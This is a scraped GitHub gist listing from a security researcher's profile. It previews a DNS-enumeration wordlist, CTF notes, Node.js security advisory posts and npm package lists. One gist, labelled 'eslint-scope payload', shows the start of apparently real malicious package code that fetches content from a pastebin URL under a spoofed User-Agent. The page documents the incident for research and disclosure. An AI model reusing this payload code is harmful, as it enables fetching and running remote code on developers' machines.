Skip to content

Instantly share code, notes, and snippets.

View evilpacket's full-sized avatar
:octocat:

Adam Baldwin evilpacket

:octocat:
View GitHub Profile
@evilpacket
evilpacket / all.txt
Created December 12, 2020 00:28 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
URLs people tried (so far): https://gist.github.com/evilpacket/6651547a3d3e39bef75eee35f321f25f
Flag 1:
1. @jstash
2. @cnelson
3. @JF0LKINS
Flag 2:
1.
(Swedish) Girl with a dragon tattoo
Hackers
WarGames
Antitrust
Swordfish
TRON
Sneakers
Joe Dante's Explorers (1985)
The imitation game
The KGB, the computer, and me
date slug tags title author type
Wed Jan 14 17:30:08 PST 2015
the-dangers-of-square-bracket-notation
security, node.js, javascript, hapi, RCE, square bracket notation, io.js
The Dangers of Square Bracket Notation
Jon Lamendola
text

We are going to be looking at some peculiar and potentially dangerous implications of Javascript's square bracket notation in this post: where you shouldn't use this style of object access and why, as well how to use it safely when needed.

date slug tags title author type
2013-09-07 17:03:10 GMT
bypass-connect-csrf-protection-by-abusing
CSRF, connect, methodOverride, middleware
Bypass Connect CSRF protection by abusing methodOverride Middleware
Node Security Team
text

Since our platform isn't setup for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.

date slug tags title author type
2014-08-19 17:04:34 GMT
Avoid-Command-Injection-Node.js
security, node.js, injection
Avoiding Command Injection in Node.js
Adam Baldwin
text
date slug tags title author type
Mon Nov 03 8:00:00 PDT 2014
regular-expression-dos-and-node.js
security, node.js, redos
Regular Expression DoS and Node.js
Adam Baldwin
text

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you instead get 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most and the conference is losing out on your purchase, all because the application is unavailable.

@evilpacket
evilpacket / build.js
Created July 13, 2018 00:31
eslint-scope payload
try {
var https = require("https");
https
.get(
{
hostname: "pastebin.com",
path: "/raw/XLeVP82h",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog